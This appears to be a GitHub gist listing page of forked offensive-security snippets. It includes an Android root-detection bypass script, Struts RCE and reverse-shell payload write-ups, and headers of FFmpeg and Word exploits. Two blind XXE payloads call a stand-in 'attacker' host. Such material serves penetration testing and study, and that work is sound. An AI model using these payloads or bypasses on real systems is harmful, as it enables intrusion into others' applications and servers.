Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
AmesianX AmesianX
AmesianX
/ web-servers.md
Created
May 23, 2021 14:15
— forked from willurd/web-servers.md
Big list of http static server one-liners
AmesianX
/ apollo.txt
Created
April 24, 2021 08:19
— forked from littlelailo/apollo.txt
Apple Bootrom Bug
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This bug was also called moonshine in the beginning | |
| Basically the following bug is present in all bootroms I have looked at: | |
| 1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output | |
| 2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code | |
| 3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer | |
| 4. it then returns wLength which is the length it wants to recieve into the buffer | |
| 5. the usb main code then updates a global var with the length and gets ready to recieve the data packages | |
| 6. if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were recieved already | |
| 7. if all the data was recieved th |
AmesianX
/ root_bypass.js
Created
April 6, 2021 01:15
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
AmesianX
/ struts-cheatsheet.md
Created
March 23, 2021 22:30
— forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet
Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware will be handling additional parameters passed to every function invocation.
AmesianX
/ msfvenom-reverse-tcp-WaitForSingleObject.md
Created
March 23, 2021 22:12
— forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.
Contents:
AmesianX
/ blind-xxe-payload-1.txt
Created
March 23, 2021 22:11
— forked from mgeeky/blind-xxe-payload-1.txt
Simplest Blind XXE Payload to test within HTML request
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Content-Type: text/xml | |
| <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
AmesianX
/ ffmpeg-0.4.9-exploit.py
Created
March 23, 2021 22:10
— forked from mgeeky/ffmpeg-0.4.9-exploit.py
CVE-2009-0385 FFmpeg 0.4.9-pre1 Type Conversion into Write-What-Where exploit (non RELRO)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Vulnerable software: | |
| # FFmpeg 0.4.9-pre1 (before 0.5), or the one accessible at: | |
| # SVN-16556 | |
| # svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg | |
| # | |
| # Vulnerability has been discovered and documented by: | |
| # Tobias Klein / http://www.trapkit.de | |
| # http://www.trapkit.de/advisories/TKADV2009-004.txt |
AmesianX
/ word2017-0199.py
Created
March 23, 2021 22:10
— forked from mgeeky/word2017-0199.py
Microsoft Word (CVE-2017-0199) RCE through a HTA Handler, by Juan Sacco / <jsacco@exploitpack.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Author: Juan Sacco at KPN Red Team | |
| # Developed using Exploit Pack - http://www.exploitpack.com <jsacco@exploitpack.com> | |
| # | |
| # Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough a HTA Handler | |
| # A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. | |
| # An attacker who successfully exploited this vulnerability could take control of an affected system. | |
| # | |
| # Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the | |
| # context of the application. Failed exploit attempts could result in a | |
| # denial-of-service condition. |
AmesianX
/ smtpAudit.py
Created
March 23, 2021 22:08
— forked from mgeeky/smtpAudit.py
SMTP Black-Box configuration audit / penetration testing tool - able to parse SPF/DKIM/Banner, test for Open-Relaying, test SSL/TLS enforcement and verify other common misconfigurations.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # | |
| # SMTP Server configuration black-box testing/audit tool, capable of auditing | |
| # SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS) | |
| # user enumerations (VRFY, EXPN, RCPT TO), and others. | |
| # | |
| # Currently supported tests: | |
| # 01) 'spf' - SPF DNS record test | |
| # - 'spf-version' - Checks whether SPF record version is valid | |
| # - 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly |